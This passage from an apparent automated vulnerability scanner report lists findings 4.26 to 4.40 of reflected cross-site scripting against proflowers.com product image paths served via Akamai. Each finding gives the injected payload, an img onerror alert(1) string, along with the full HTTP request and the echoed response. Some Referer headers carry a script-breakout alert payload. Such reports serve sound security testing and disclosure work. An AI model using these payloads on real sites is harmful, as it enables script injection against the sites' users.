Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/F08_311626_PF799e8<img src=a onerror=alert(1)>5150b0f3d58

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39 was submitted in the REST URL parameter 9. This input was echoed as d8768<img src=a onerror=alert(1)>6cd8c2fda39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PFd8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:02 GMT
Connection: close

Unable to find /ProvideCommerce/FD08_149362_W_2_PFd8768<img src=a onerror=alert(1)>6cd8c2fda39

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47 was submitted in the REST URL parameter 9. This input was echoed as 5df3f<img src=a onerror=alert(1)>a18490b2d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:37 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img src=a onerror=alert(1)>a18490b2d47

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b753f<img%20src%3da%20onerror%3dalert(1)>54a735179c was submitted in the REST URL parameter 9. This input was echoed as b753f<img src=a onerror=alert(1)>54a735179c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img%20src%3da%20onerror%3dalert(1)>54a735179c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img src=a onerror=alert(1)>54a735179c

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3 was submitted in the REST URL parameter 9. This input was echoed as ae9c6<img src=a onerror=alert(1)>e50248b99e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:12 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img src=a onerror=alert(1)>e50248b99e3

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea was submitted in the REST URL parameter 9. This input was echoed as 1f963<img src=a onerror=alert(1)>0abf99f1fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:15 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img src=a onerror=alert(1)>0abf99f1fea

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19 was submitted in the REST URL parameter 9. This input was echoed as 1bd76<img src=a onerror=alert(1)>d86e9b37c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:31 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img src=a onerror=alert(1)>d86e9b37c19

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259 was submitted in the REST URL parameter 9. This input was echoed as 34c7a<img src=a onerror=alert(1)>c0a23b23259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:05 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img src=a onerror=alert(1)>c0a23b23259

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84 was submitted in the REST URL parameter 9. This input was echoed as 8ece4<img src=a onerror=alert(1)>c6f0ee0aa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img src=a onerror=alert(1)>c6f0ee0aa84

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3 was submitted in the REST URL parameter 9. This input was echoed as 53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:59 GMT
Connection: close

Unable to find /ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839 was submitted in the REST URL parameter 9. This input was echoed as 73bd4<img src=a onerror=alert(1)>3471c81f839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img src=a onerror=alert(1)>3471c81f839

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028 was submitted in the REST URL parameter 9. This input was echoed as 34789<img src=a onerror=alert(1)>a33706b7028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn34789<img src=a onerror=alert(1)>a33706b7028

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3 was submitted in the REST URL parameter 9. This input was echoed as 55ab4<img src=a onerror=alert(1)>7e214382de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:49 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20assrt10_PF55ab4<img src=a onerror=alert(1)>7e214382de3

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139 was submitted in the REST URL parameter 9. This input was echoed as a9baa<img src=a onerror=alert(1)>043817ff139 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PFa9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20blue_gv11_PFa9baa<img src=a onerror=alert(1)>043817ff139

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6 was submitted in the REST URL parameter 9. This input was echoed as b58f3<img src=a onerror=alert(1)>89a2ea4ec6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:08 GMT
Connection: close

Unable to find /ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img src=a onerror=alert(1)>89a2ea4ec6

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372 was submitted in the REST URL parameter 9. This input was echoed as 520ee<img src=a onerror=alert(1)>73aa06e9372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
